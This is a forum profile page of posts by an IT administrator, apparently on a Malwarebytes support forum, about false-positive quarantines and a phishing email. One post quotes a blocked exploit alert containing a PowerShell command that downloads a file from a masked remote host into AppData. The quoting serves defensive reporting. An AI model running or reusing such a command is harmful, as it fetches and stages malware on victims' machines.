SCL

Members
  • Content Count: 6
  • Joined
  • Last visited
  • Community Reputation: 0 Neutral
  • Rank: New Member

Posts by SCL
  1. OK, thanks for confirming, guys. Where are the scan logs saved?
  2. After further investigation, I see it was not Active Protection but it was a Quick Scan.
  3. MBAM Active Protection has identified PuTTY-related files as Locky on several machines on my network. The files have been quarantined and I am hesitant to unquarantine. File names are C:\Program Files\Putty\plink.exe, C:\Windows\Installer\66785c8.msi and C:\Users\*USERNAME*\downloads\putty-64bit-0.68-installer.msi. Is there a log somewhere that I can attach? Or what else needs to be done? Need to verify that this was indeed a false positive.
  4. Thanks, Pedro. I have to say, no amount of user training is going to beat this. It was shockingly good. Going to have to continue improving protections. If this becomes the norm, it's a whole new ball game. Absolutely none of the typical signs of it being fake.
  5. We have gotten AE alerts before. Usually harmless. However, this morning multiple malicious emails came into the organization, all from the same sender, and 2 users opened the attachment (Word doc). I received the alert below: 8/31/2017 7:00:09 AM Computer18 10.10.1.125 Exploit payload process blocked BLOCK C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('http:\*******************.com\okas\kunkd.dat', $env:APPDATA
  6. Looks like I might have a false positive. On MBAM for Business and seeing this file quarantined widely. Not sure how to grab the log on the business version... idapinst.zip